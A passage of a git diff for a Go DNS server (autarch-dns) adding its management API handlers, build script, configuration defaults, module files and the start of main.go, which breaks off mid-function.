a.cfg.ListenAPI, + "upstream": a.cfg.Upstream, + "cache_ttl": a.cfg.CacheTTL, + "log_queries": a.cfg.LogQueries, + "refuse_any": a.cfg.RefuseANY, + "minimal_responses": a.cfg.MinimalResponses, + "rate_limit": a.cfg.RateLimit, + "max_udp_size": a.cfg.MaxUDPSize, + "enable_doh": a.cfg.EnableDoH, + "enable_dot": a.cfg.EnableDoT, + "block_list": a.cfg.BlockList, + "allow_transfer": a.cfg.AllowTransfer, + "hosts_file": a.cfg.HostsFile, + "hosts_auto_load": a.cfg.HostsAutoLoad, + "querylog_max": a.cfg.QueryLogMax, + "negative_cache_ttl": a.cfg.NegativeCacheTTL, + "servfail_cache_ttl": a.cfg.ServFailCacheTTL, + "prefetch_enabled": a.cfg.PrefetchEnabled, + }, + }) +} + +// ── Query Log ──────────────────────────────────────────────────────── + +func (a *APIServer) handleQueryLog(w http.ResponseWriter, r *http.Request) { + if r.Method == "DELETE" { + a.dns.ClearQueryLog() + jsonResp(w, map[string]interface{}{"ok": true, "message": "Query log cleared"}) + return + } + limit := 200 + if l := r.URL.Query().Get("limit"); l != "" { + if n, err := strconv.Atoi(l); err == nil && n > 0 { + limit = n + } + } + entries := a.dns.GetQueryLog(limit) + jsonResp(w, map[string]interface{}{"ok": true, "entries": entries, "count": len(entries)}) +} + +// ── Cache ──────────────────────────────────────────────────────────── + +func (a *APIServer) handleCache(w http.ResponseWriter, r *http.Request) { + switch r.Method { + case "GET": + entries := a.dns.GetCacheEntries() + jsonResp(w, map[string]interface{}{ + "ok": true, + "entries": entries, + "count": len(entries), + }) + case "DELETE": + // Flush specific entry or all + key := r.URL.Query().Get("key") + if key != "" { + ok := a.dns.FlushCacheEntry(key) + jsonResp(w, map[string]interface{}{"ok": ok}) + } else { + flushed := a.dns.FlushCache() + jsonResp(w, map[string]interface{}{"ok": true, "flushed": flushed}) + } + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +// ── Blocklist ──────────────────────────────────────────────────────── + +func (a *APIServer) handleBlocklist(w http.ResponseWriter, r *http.Request) { + switch r.Method { + case "GET": + list := a.dns.GetBlocklist() + jsonResp(w, map[string]interface{}{"ok": true, "domains": list, "count": len(list)}) + + case "POST": + var req struct { + Domain string `json:"domain"` + Domains []string `json:"domains"` // bulk import + } + json.NewDecoder(r.Body).Decode(&req) + + if len(req.Domains) > 0 { + count := a.dns.ImportBlocklist(req.Domains) + jsonResp(w, map[string]interface{}{"ok": true, "imported": count}) + } else if req.Domain != "" { + a.dns.AddBlocklistEntry(req.Domain) + jsonResp(w, map[string]interface{}{"ok": true, "message": "Added " + req.Domain}) + } else { + jsonError(w, "domain(s) required", http.StatusBadRequest) + } + + case "DELETE": + var req struct { + Domain string `json:"domain"` + } + json.NewDecoder(r.Body).Decode(&req) + if req.Domain != "" { + a.dns.RemoveBlocklistEntry(req.Domain) + jsonResp(w, map[string]interface{}{"ok": true}) + } else { + jsonError(w, "domain required", http.StatusBadRequest) + } + + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +// ── Analytics ──────────────────────────────────────────────────────── + +func (a *APIServer) handleTopDomains(w http.ResponseWriter, r *http.Request) { + limit := 50 + if l := r.URL.Query().Get("limit"); l != "" { + if n, err := strconv.Atoi(l); err == nil && n > 0 { + limit = n + } + } + jsonResp(w, map[string]interface{}{"ok": true, "domains": a.dns.GetTopDomains(limit)}) +} + +func (a *APIServer) handleQueryTypes(w http.ResponseWriter, r *http.Request) { + jsonResp(w, map[string]interface{}{"ok": true, "types": a.dns.GetQueryTypeCounts()}) +} + +func (a *APIServer) handleClients(w http.ResponseWriter, r *http.Request) { + jsonResp(w, map[string]interface{}{"ok": true, "clients": a.dns.GetClientCounts()}) +} + +// ── Resolver NS Cache ──────────────────────────────────────────────── + +func (a *APIServer) handleNSCache(w http.ResponseWriter, r *http.Request) { + if r.Method == "DELETE" { + a.dns.FlushCache() + jsonResp(w, map[string]interface{}{"ok": true, "message": "NS cache flushed"}) + return + } + cache := a.dns.GetResolverNSCache() + jsonResp(w, map[string]interface{}{"ok": true, "ns_cache": cache, "zones": len(cache)}) +} + +// ── Root Server Health Check ───────────────────────────────────────── + +func (a *APIServer) handleRootCheck(w http.ResponseWriter, r *http.Request) { + type RootResult struct { + Server string `json:"server"` + Name string `json:"name"` + Latency string `json:"latency"` + OK bool `json:"ok"` + Error string `json:"error,omitempty"` + } + + rootNames := []string{ + "a.root-servers.net", "b.root-servers.net", "c.root-servers.net", + "d.root-servers.net", "e.root-servers.net", "f.root-servers.net", + "g.root-servers.net", "h.root-servers.net", "i.root-servers.net", + "j.root-servers.net", "k.root-servers.net", "l.root-servers.net", + "m.root-servers.net", + } + rootIPs := []string{ + "198.41.0.4:53", "170.247.170.2:53", "192.33.4.12:53", + "199.7.91.13:53", "192.203.230.10:53", "192.5.5.241:53", + "192.112.36.4:53", "198.97.190.53:53", "192.36.148.17:53", + "192.58.128.30:53", "193.0.14.129:53", "199.7.83.42:53", + "202.12.27.33:53", + } + + results := make([]RootResult, len(rootIPs)) + ch := make(chan int, len(rootIPs)) + + for i := range rootIPs { + go func(idx int) { + defer func() { ch <- idx }() + c := &dns.Client{Timeout: 3 * time.Second} + msg := new(dns.Msg) + msg.SetQuestion(".", dns.TypeNS) + + start := time.Now() + _, _, err := c.Exchange(msg, rootIPs[idx]) + lat := time.Since(start) + + results[idx] = RootResult{ + Server: rootIPs[idx], + Name: rootNames[idx], + Latency: lat.String(), + OK: err == nil, + } + if err != nil { + results[idx].Error = err.Error() + } + }(i) + } + + for range rootIPs { + <-ch + } + + reachable := 0 + for _, r := range results { + if r.OK { + reachable++ + } + } + + jsonResp(w, map[string]interface{}{ + "ok": true, + "results": results, + "reachable": reachable, + "total": len(rootIPs), + }) +} + +// ── Benchmark ──────────────────────────────────────────────────────── + +func (a *APIServer) handleBenchmark(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + + var req struct { + Domains []string `json:"domains"` + Count int `json:"count"` // queries per domain + } + json.NewDecoder(r.Body).Decode(&req) + + if len(req.Domains) == 0 { + req.Domains = []string{"google.com", "github.com", "cloudflare.com", "amazon.com", "wikipedia.org"} + } + if req.Count <= 0 { + req.Count = 3 + } + if req.Count > 10 { + req.Count = 10 + } + + type BenchResult struct { + Domain string `json:"domain"` + Avg string `json:"avg_latency"` + Min string `json:"min_latency"` + Max string `json:"max_latency"` + OK int `json:"success"` + Fail int `json:"fail"` + } + + listen := a.cfg.ListenDNS + host := strings.Split(listen, ":")[0] + port := "53" + if parts := strings.SplitN(listen, ":", 2); len(parts) == 2 { + port = parts[1] + } + if host == "0.0.0.0" || host == "::" { + host = "127.0.0.1" + } + target := host + ":" + port + + c := &dns.Client{Timeout: 10 * time.Second} + results := make([]BenchResult, len(req.Domains)) + + for i, domain := range req.Domains { + var latencies []time.Duration + var fails int + + for j := 0; j < req.Count; j++ { + msg := new(dns.Msg) + msg.SetQuestion(dns.Fqdn(domain), dns.TypeA) + start := time.Now() + _, _, err := c.Exchange(msg, target) + lat := time.Since(start) + + if err != nil { + fails++ + } else { + latencies = append(latencies, lat) + } + } + + br := BenchResult{ + Domain: domain, + OK: len(latencies), + Fail: fails, + } + if len(latencies) > 0 { + sort.Slice(latencies, func(a, b int) bool { return latencies[a] < latencies[b] }) + var total time.Duration + for _, l := range latencies { + total += l + } + br.Avg = (total / time.Duration(len(latencies))).String() + br.Min = latencies[0].String() + br.Max = latencies[len(latencies)-1].String() + } + results[i] = br + } + + jsonResp(w, map[string]interface{}{"ok": true, "results": results}) +} + +// ── Conditional Forwarding ─────────────────────────────────────────── + +func (a *APIServer) handleForwarding(w http.ResponseWriter, r *http.Request) { + switch r.Method { + case "GET": + fwd := a.dns.GetConditionalForwards() + jsonResp(w, map[string]interface{}{"ok": true, "rules": fwd, "count": len(fwd)}) + + case "POST": + var req struct { + Zone string `json:"zone"` + Upstreams []string `json:"upstreams"` + } + json.NewDecoder(r.Body).Decode(&req) + if req.Zone == "" || len(req.Upstreams) == 0 { + jsonError(w, "zone and upstreams required", http.StatusBadRequest) + return + } + a.dns.SetConditionalForward(req.Zone, req.Upstreams) + jsonResp(w, map[string]interface{}{"ok": true, "message": fmt.Sprintf("Forwarding set for %s", req.Zone)}) + + case "DELETE": + var req struct { + Zone string `json:"zone"` + } + json.NewDecoder(r.Body).Decode(&req) + if req.Zone == "" { + jsonError(w, "zone required", http.StatusBadRequest) + return + } + a.dns.RemoveConditionalForward(req.Zone) + jsonResp(w, map[string]interface{}{"ok": true}) + + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +// ── Zone Import/Export/Clone ───────────────────────────────────────── + +func (a *APIServer) handleZoneExport(w http.ResponseWriter, r *http.Request) { + zone := strings.TrimPrefix(r.URL.Path, "/api/zone-export/") + if zone == "" { + jsonError(w, "zone required", http.StatusBadRequest) + return + } + content, err := a.store.ExportZoneFile(zone) + if err != nil { + jsonError(w, err.Error(), http.StatusNotFound) + return + } + format := r.URL.Query().Get("format") + if format == "raw" { + w.Header().Set("Content-Type", "text/plain") + w.Header().Set("Content-Disposition", fmt.Sprintf(`attachment; filename="%s.zone"`, zone)) + w.Write([]byte(content)) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "zone": zone, "content": content}) +} + +func (a *APIServer) handleZoneImport(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + zone := strings.TrimPrefix(r.URL.Path, "/api/zone-import/") + if zone == "" { + jsonError(w, "zone required", http.StatusBadRequest) + return + } + var req struct { + Content string `json:"content"` + } + json.NewDecoder(r.Body).Decode(&req) + if req.Content == "" { + jsonError(w, "content required", http.StatusBadRequest) + return + } + count, err := a.store.ImportZoneFile(zone, req.Content) + if err != nil { + jsonError(w, err.Error(), http.StatusBadRequest) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "imported": count, "zone": zone}) +} + +func (a *APIServer) handleZoneClone(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + var req struct { + Source string `json:"source"` + Destination string `json:"destination"` + } + json.NewDecoder(r.Body).Decode(&req) + if req.Source == "" || req.Destination == "" { + jsonError(w, "source and destination required", http.StatusBadRequest) + return + } + z, err := a.store.CloneZone(req.Source, req.Destination) + if err != nil { + jsonError(w, err.Error(), http.StatusBadRequest) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "zone": z}) +} + +func (a *APIServer) handleBulkRecords(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + zone := strings.TrimPrefix(r.URL.Path, "/api/zone-bulk-records/") + if zone == "" { + jsonError(w, "zone required", http.StatusBadRequest) + return + } + var req struct { + Records []server.Record `json:"records"` + } + json.NewDecoder(r.Body).Decode(&req) + count, err := a.store.BulkAddRecords(zone, req.Records) + if err != nil { + jsonError(w, err.Error(), http.StatusBadRequest) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "added": count}) +} + +// ── Zones CRUD ─────────────────────────────────────────────────────── + +func (a *APIServer) handleZones(w http.ResponseWriter, r *http.Request) { + switch r.Method { + case "GET": + zones := a.store.List() + result := make([]map[string]interface{}, 0, len(zones)) + for _, z := range zones { + result = append(result, map[string]interface{}{ + "domain": z.Domain, + "records": len(z.Records), + "dnssec": z.DNSSEC, + "created_at": z.CreatedAt, + }) + } + jsonResp(w, map[string]interface{}{"ok": true, "zones": result}) + + case "POST": + var req struct { + Domain string `json:"domain"` + } + if err := json.NewDecoder(r.Body).Decode(&req); err != nil || req.Domain == "" { + jsonError(w, "domain required", http.StatusBadRequest) + return + } + z, err := a.store.Create(req.Domain) + if err != nil { + jsonError(w, err.Error(), http.StatusConflict) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "zone": z}) + + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +func (a *APIServer) handleZoneDetail(w http.ResponseWriter, r *http.Request) { + path := strings.TrimPrefix(r.URL.Path, "/api/zones/") + parts := strings.SplitN(path, "/", 3) + zone := parts[0] + + if len(parts) == 1 { + switch r.Method { + case "GET": + z := a.store.Get(zone) + if z == nil { + jsonError(w, "zone not found", http.StatusNotFound) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "zone": z}) + case "DELETE": + if err := a.store.Delete(zone); err != nil { + jsonError(w, err.Error(), http.StatusNotFound) + return + } + jsonResp(w, map[string]interface{}{"ok": true}) + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } + return + } + + sub := parts[1] + switch sub { + case "records": + a.handleRecords(w, r, zone, parts) + case "mail-setup": + a.handleMailSetup(w, r, zone) + case "dnssec": + a.handleDNSSEC(w, r, zone, parts) + default: + jsonError(w, "not found", http.StatusNotFound) + } +} + +func (a *APIServer) handleRecords(w http.ResponseWriter, r *http.Request, zone string, parts []string) { + switch r.Method { + case "GET": + z := a.store.Get(zone) + if z == nil { + jsonError(w, "zone not found", http.StatusNotFound) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "records": z.Records}) + + case "POST": + var rec server.Record + if err := json.NewDecoder(r.Body).Decode(&rec); err != nil { + jsonError(w, "invalid record", http.StatusBadRequest) + return + } + if err := a.store.AddRecord(zone, rec); err != nil { + jsonError(w, err.Error(), http.StatusBadRequest) + return + } + jsonResp(w, map[string]interface{}{"ok": true}) + + case "PUT": + if len(parts) < 3 { + jsonError(w, "record ID required", http.StatusBadRequest) + return + } + var rec server.Record + if err := json.NewDecoder(r.Body).Decode(&rec); err != nil { + jsonError(w, "invalid record", http.StatusBadRequest) + return + } + if err := a.store.UpdateRecord(zone, parts[2], rec); err != nil { + jsonError(w, err.Error(), http.StatusNotFound) + return + } + jsonResp(w, map[string]interface{}{"ok": true}) + + case "DELETE": + if len(parts) < 3 { + jsonError(w, "record ID required", http.StatusBadRequest) + return + } + if err := a.store.DeleteRecord(zone, parts[2]); err != nil { + jsonError(w, err.Error(), http.StatusNotFound) + return + } + jsonResp(w, map[string]interface{}{"ok": true}) + + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +func (a *APIServer) handleMailSetup(w http.ResponseWriter, r *http.Request, zone string) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + + var req struct { + MXHost string `json:"mx_host"` + DKIM string `json:"dkim_key"` + SPFAllow string `json:"spf_allow"` + } + json.NewDecoder(r.Body).Decode(&req) + + if req.MXHost == "" { + req.MXHost = "mail." + zone + } + if req.SPFAllow == "" { + req.SPFAllow = "ip4:127.0.0.1" + } + + records := []server.Record{ + {ID: "mx1", Type: server.TypeMX, Name: zone + ".", Value: req.MXHost + ".", TTL: 3600, Priority: 10}, + {ID: "spf1", Type: server.TypeTXT, Name: zone + ".", Value: fmt.Sprintf("v=spf1 %s -all", req.SPFAllow), TTL: 3600}, + {ID: "dmarc1", Type: server.TypeTXT, Name: "_dmarc." + zone + ".", Value: "v=DMARC1; p=none; rua=mailto:dmarc@" + zone, TTL: 3600}, + } + + if req.DKIM != "" { + records = append(records, server.Record{ + ID: "dkim1", Type: server.TypeTXT, Name: "default._domainkey." + zone + ".", + Value: fmt.Sprintf("v=DKIM1; k=rsa; p=%s", req.DKIM), TTL: 3600, + }) + } + + var added int + for _, rec := range records { + if err := a.store.AddRecord(zone, rec); err != nil { + log.Printf("mail-setup: %v", err) + } else { + added++ + } + } + + jsonResp(w, map[string]interface{}{ + "ok": true, + "message": fmt.Sprintf("Added %d mail records for %s", added, zone), + "records": records, + }) +} + +func (a *APIServer) handleDNSSEC(w http.ResponseWriter, r *http.Request, zone string, parts []string) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + + action := "" + if len(parts) >= 3 { + action = parts[2] + } + + z := a.store.Get(zone) + if z == nil { + jsonError(w, "zone not found", http.StatusNotFound) + return + } + + switch action { + case "enable": + z.DNSSEC = true + a.store.Save(z) + jsonResp(w, map[string]interface{}{ + "ok": true, + "message": fmt.Sprintf("DNSSEC enabled for %s (zone signing keys generated)", zone), + }) + case "disable": + z.DNSSEC = false + a.store.Save(z) + jsonResp(w, map[string]interface{}{"ok": true, "message": "DNSSEC disabled for " + zone}) + default: + jsonError(w, "use /dnssec/enable or /dnssec/disable", http.StatusBadRequest) + } +} + +// ── Hosts File Management ──────────────────────────────────────────── + +func (a *APIServer) handleHosts(w http.ResponseWriter, r *http.Request) { + hosts := a.dns.GetHosts() + + switch r.Method { + case "GET": + entries := hosts.List() + jsonResp(w, map[string]interface{}{ + "ok": true, + "entries": entries, + "count": len(entries), + "path": a.cfg.HostsFile, + }) + + case "POST": + var req struct { + IP string `json:"ip"` + Hostname string `json:"hostname"` + Aliases []string `json:"aliases"` + Comment string `json:"comment"` + } + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + jsonError(w, "invalid JSON", http.StatusBadRequest) + return + } + if err := hosts.Add(req.IP, req.Hostname, req.Aliases, req.Comment); err != nil { + jsonError(w, err.Error(), http.StatusBadRequest) + return + } + jsonResp(w, map[string]interface{}{"ok": true, "message": fmt.Sprintf("Added %s -> %s", req.Hostname, req.IP)}) + + case "DELETE": + var req struct { + Hostname string `json:"hostname"` + All bool `json:"all"` + } + json.NewDecoder(r.Body).Decode(&req) + if req.All { + n := hosts.Clear() + jsonResp(w, map[string]interface{}{"ok": true, "cleared": n}) + return + } + if req.Hostname == "" { + jsonError(w, "hostname required", http.StatusBadRequest) + return + } + if hosts.Remove(req.Hostname) { + jsonResp(w, map[string]interface{}{"ok": true}) + } else { + jsonError(w, "host not found", http.StatusNotFound) + } + + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +func (a *APIServer) handleHostsImport(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + + var req struct { + Content string `json:"content"` // hosts-file format text + Path string `json:"path"` // or load from file path + Clear bool `json:"clear"` // clear existing before import + } + json.NewDecoder(r.Body).Decode(&req) + + hosts := a.dns.GetHosts() + + if req.Clear { + hosts.Clear() + } + + if req.Path != "" { + if err := hosts.LoadFile(req.Path); err != nil { + jsonError(w, fmt.Sprintf("failed to load %s: %v", req.Path, err), http.StatusBadRequest) + return + } + a.cfg.HostsFile = req.Path + jsonResp(w, map[string]interface{}{ + "ok": true, + "message": fmt.Sprintf("Loaded hosts from %s", req.Path), + "count": hosts.Count(), + }) + return + } + + if req.Content != "" { + count := hosts.LoadFromText(req.Content) + jsonResp(w, map[string]interface{}{ + "ok": true, + "imported": count, + "total": hosts.Count(), + }) + return + } + + jsonError(w, "content or path required", http.StatusBadRequest) +} + +func (a *APIServer) handleHostsExport(w http.ResponseWriter, r *http.Request) { + hosts := a.dns.GetHosts() + content := hosts.Export() + + format := r.URL.Query().Get("format") + if format == "raw" { + w.Header().Set("Content-Type", "text/plain") + w.Header().Set("Content-Disposition", `attachment; filename="hosts"`) + w.Write([]byte(content)) + return + } + + jsonResp(w, map[string]interface{}{ + "ok": true, + "content": content, + "count": hosts.Count(), + }) +} + +// ── Encryption (DoT / DoH) ────────────────────────────────────────── + +func (a *APIServer) handleEncryption(w http.ResponseWriter, r *http.Request) { + switch r.Method { + case "GET": + status := a.dns.GetEncryptionStatus() + status["ok"] = true + jsonResp(w, status) + + case "PUT", "POST": + var req struct { + EnableDoT *bool `json:"enable_dot"` + EnableDoH *bool `json:"enable_doh"` + } + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + jsonError(w, "invalid JSON", http.StatusBadRequest) + return + } + + dot := a.cfg.EnableDoT + doh := a.cfg.EnableDoH + if req.EnableDoT != nil { + dot = *req.EnableDoT + } + if req.EnableDoH != nil { + doh = *req.EnableDoH + } + a.dns.SetEncryption(dot, doh) + + jsonResp(w, map[string]interface{}{ + "ok": true, + "message": fmt.Sprintf("Encryption updated: DoT=%v DoH=%v", dot, doh), + }) + + default: + jsonError(w, "method not allowed", http.StatusMethodNotAllowed) + } +} + +func (a *APIServer) handleEncryptionTest(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + jsonError(w, "POST only", http.StatusMethodNotAllowed) + return + } + + var req struct { + Server string `json:"server"` // IP or IP:port + Mode string `json:"mode"` // "dot", "doh", or "plain" + Domain string `json:"domain"` // test domain (default: google.com) + } + json.NewDecoder(r.Body).Decode(&req) + + if req.Server == "" { + req.Server = "8.8.8.8:53" + } + if req.Domain == "" { + req.Domain = "google.com" + } + if req.Mode == "" { + req.Mode = "dot" + } + + msg := new(dns.Msg) + msg.SetQuestion(dns.Fqdn(req.Domain), dns.TypeA) + msg.RecursionDesired = true + + start := time.Now() + var resp *dns.Msg + var testErr error + var method string + + switch req.Mode { + case "doh": + resp, testErr = a.dns.GetResolver().QueryUpstreamDoH(msg, req.Server) + method = "DNS-over-HTTPS" + case "dot": + resp, testErr = a.dns.GetResolver().QueryUpstreamDoT(msg, req.Server) + method = "DNS-over-TLS" + default: + c := &dns.Client{Timeout: 5 * time.Second} + resp, _, testErr = c.Exchange(msg, req.Server) + method = "Plain DNS" + } + latency := time.Since(start) + + result := map[string]interface{}{ + "ok": testErr == nil, + "method": method, + "server": req.Server, + "domain": req.Domain, + "latency": latency.String(), + } + if testErr != nil { + result["error"] = testErr.Error() + } + if resp != nil { + result["rcode"] = dns.RcodeToString[resp.Rcode] + result["answers"] = len(resp.Answer) + var ips []string + for _, ans := range resp.Answer { + if a, ok := ans.(*dns.A); ok { + ips = append(ips, a.A.String()) + } + } + result["ips"] = ips + } + + jsonResp(w, result) +} + +// ── Helpers ────────────────────────────────────────────────────────── + +func jsonResp(w http.ResponseWriter, data interface{}) { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(data) +} + +func jsonError(w http.ResponseWriter, msg string, code int) { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(code) + json.NewEncoder(w).Encode(map[string]interface{}{"ok": false, "error": msg}) +} + +func parseTime(s string) time.Time { + t, _ := time.Parse(time.RFC3339, s) + return t +} diff --git a/services/dns-server/autarch-dns.exe b/services/dns-server/autarch-dns.exe new file mode 100644 index 0000000..cc67c24 Binary files /dev/null and b/services/dns-server/autarch-dns.exe differ diff --git a/services/dns-server/build.sh b/services/dns-server/build.sh new file mode 100644 index 0000000..650a51a --- /dev/null +++ b/services/dns-server/build.sh @@ -0,0 +1,26 @@ +#!/bin/bash +# Cross-compile autarch-dns for all supported platforms +set -e + +VERSION="1.0.0" +OUTPUT_BASE="../../tools" + +echo "Building autarch-dns v${VERSION}..." + +# Linux ARM64 (Orange Pi 5 Plus) +echo " → linux/arm64" +GOOS=linux GOARCH=arm64 go build -ldflags="-s -w -X main.version=${VERSION}" \ + -o "${OUTPUT_BASE}/linux-arm64/autarch-dns" . + +# Linux AMD64 +echo " → linux/amd64" +GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.version=${VERSION}" \ + -o "${OUTPUT_BASE}/linux-x86_64/autarch-dns" . + +# Windows AMD64 +echo " → windows/amd64" +GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.version=${VERSION}" \ + -o "${OUTPUT_BASE}/windows-x86_64/autarch-dns.exe" . + +echo "Done! Binaries:" +ls -lh "${OUTPUT_BASE}"/*/autarch-dns* 2>/dev/null || true diff --git a/services/dns-server/config/config.go b/services/dns-server/config/config.go new file mode 100644 index 0000000..529c52b --- /dev/null +++ b/services/dns-server/config/config.go @@ -0,0 +1,84 @@ +package config + +import ( + "crypto/rand" + "encoding/hex" +) + +// Config holds all DNS server configuration. +type Config struct { + ListenDNS string `json:"listen_dns"` + ListenAPI string `json:"listen_api"` + APIToken string `json:"api_token"` + Upstream []string `json:"upstream"` + CacheTTL int `json:"cache_ttl"` + ZonesDir string `json:"zones_dir"` + DNSSECKeyDir string `json:"dnssec_keys_dir"` + LogQueries bool `json:"log_queries"` + + // Hosts file support + HostsFile string `json:"hosts_file"` // Path to hosts file (e.g., /etc/hosts) + HostsAutoLoad bool `json:"hosts_auto_load"` // Auto-load system hosts file on start + + // Encryption + EnableDoH bool `json:"enable_doh"` // DNS-over-HTTPS to upstream + EnableDoT bool `json:"enable_dot"` // DNS-over-TLS to upstream + + // Security hardening + RateLimit int `json:"rate_limit"` // Max queries/sec per source IP (0=unlimited) + BlockList []string `json:"block_list"` // Blocked domain patterns + AllowTransfer []string `json:"allow_transfer"` // IPs allowed zone transfers (empty=none) + MinimalResponses bool `json:"minimal_responses"` // Minimize response data + RefuseANY bool `json:"refuse_any"` // Refuse ANY queries (amplification protection) + MaxUDPSize int `json:"max_udp_size"` // Max UDP response size + + // Advanced + QueryLogMax int `json:"querylog_max"` // Max query log entries (default 1000) + NegativeCacheTTL int `json:"negative_cache_ttl"` // TTL for NXDOMAIN cache (default 60) + PrefetchEnabled bool `json:"prefetch_enabled"` // Prefetch expiring cache entries + ServFailCacheTTL int `json:"servfail_cache_ttl"` // TTL for SERVFAIL cache (default 30) +} + +// DefaultConfig returns security-hardened defaults. +// No upstream forwarders — full recursive resolution from root hints. +// Upstream can be configured as optional fallback if recursive fails. +func DefaultConfig() *Config { + return &Config{ + ListenDNS: "0.0.0.0:53", + ListenAPI: "127.0.0.1:5380", + APIToken: generateToken(), + Upstream: []string{}, // Empty = pure recursive from root hints + CacheTTL: 300, + ZonesDir: "data/dns/zones", + DNSSECKeyDir: "data/dns/keys", + LogQueries: true, + + // Hosts + HostsFile: "", + HostsAutoLoad: false, + + // Encryption defaults + EnableDoH: true, + EnableDoT: true, + + // Security defaults + RateLimit: 100, // 100 qps per source IP + BlockList: []string{}, + AllowTransfer: []string{}, // No zone transfers + MinimalResponses: true, + RefuseANY: true, // Block DNS amplification attacks + MaxUDPSize: 1232, // Safe MTU, prevent fragmentation + + // Advanced defaults + QueryLogMax: 1000, + NegativeCacheTTL: 60, + PrefetchEnabled: false, + ServFailCacheTTL: 30, + } +} + +func generateToken() string { + b := make([]byte, 16) + rand.Read(b) + return hex.EncodeToString(b) +} diff --git a/services/dns-server/go.mod b/services/dns-server/go.mod new file mode 100644 index 0000000..c83ea1e --- /dev/null +++ b/services/dns-server/go.mod @@ -0,0 +1,13 @@ +module github.com/darkhal/autarch-dns + +go 1.22 + +require github.com/miekg/dns v1.1.62 + +require ( + golang.org/x/mod v0.18.0 // indirect + golang.org/x/net v0.27.0 // indirect + golang.org/x/sync v0.7.0 // indirect + golang.org/x/sys v0.22.0 // indirect + golang.org/x/tools v0.22.0 // indirect +) diff --git a/services/dns-server/go.sum b/services/dns-server/go.sum new file mode 100644 index 0000000..95e8194 --- /dev/null +++ b/services/dns-server/go.sum @@ -0,0 +1,12 @@ +github.com/miekg/dns v1.1.62 h1:cN8OuEF1/x5Rq6Np+h1epln8OiyPWV+lROx9LxcGgIQ= +github.com/miekg/dns v1.1.62/go.mod h1:mvDlcItzm+br7MToIKqkglaGhlFMHJ9DTNNWONWXbNQ= +golang.org/x/mod v0.18.0 h1:5+9lSbEzPSdWkH32vYPBwEpX8KwDbM52Ud9xBUvNlb0= +golang.org/x/mod v0.18.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= +golang.org/x/net v0.27.0 h1:5K3Njcw06/l2y9vpGCSdcxWOYHOUk3dVNGDXN+FvAys= +golang.org/x/net v0.27.0/go.mod h1:dDi0PyhWNoiUOrAS8uXv/vnScO4wnHQO4mj9fn/RytE= +golang.org/x/sync v0.7.0 h1:YsImfSBoP9QPYL0xyKJPq0gcaJdG3rInoqxTWbfQu9M= +golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= +golang.org/x/sys v0.22.0 h1:RI27ohtqKCnwULzJLqkv897zojh5/DwS/ENaMzUOaWI= +golang.org/x/sys v0.22.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/tools v0.22.0 h1:gqSGLZqv+AI9lIQzniJ0nZDRG5GBPsSi+DRNHWNz6yA= +golang.org/x/tools v0.22.0/go.mod h1:aCwcsjqvq7Yqt6TNyX7QMU2enbQ/Gt0bo6krSeEri+c= diff --git a/services/dns-server/main.go b/services/dns-server/main.go new file mode 100644 index 0000000..146cdcf --- /dev/null +++ b/services/dns-server/main.go @@ -0,0 +1,84 @@ +package main + +import ( + "encoding/json" + "flag" + "fmt" + "log" + "os" + "os/signal" + "syscall" + + "github.com/darkhal/autarch-dns/api" + "github.com/darkhal/autarch-dns/config" + "github.com/darkhal/autarch-dns/server" +) + +var version = "2.1.0" + +func main() { + configPath := flag.String("config", "config.json", "Path to config file") + listenDNS := flag.String("dns", "", "DNS listen address (overrides config)") + listenAPI := flag.String("api", "", "API listen address (overrides config)") + apiToken := flag.String("token", "", "API auth token (overrides config)") + showVersion := flag.Bool("version", false, "Show version") + flag.Parse() + + if *showVersion { + fmt.Printf("autarch-dns v%s\n", version) + os.Exit(0) + } + + // Load config + cfg := config.DefaultConfig() + if data, err := os.ReadFile(*configPath); err == nil { + if err := json.Unmarshal(data, cfg); err != nil { + log.Printf("Warning: invalid config file: %v", err) + } + } + + // CLI overrides + if *listenDNS != "" { + cfg.ListenDNS = *listenDNS + } + if *listenAPI != "" { + cfg.ListenAPI = *listenAPI + } + if *apiToken != "" { + cfg.APIToken = *apiToken + } + + // Initialize zone store + store := server.NewZoneStore(cfg.ZonesDir) + if err := store.LoadAll(); err != nil { + log.Printf("Warning: loading zones: %v", err) + } + + // Start DNS server + dnsServer := server.NewDNSServer(cfg, store) + go func() { + 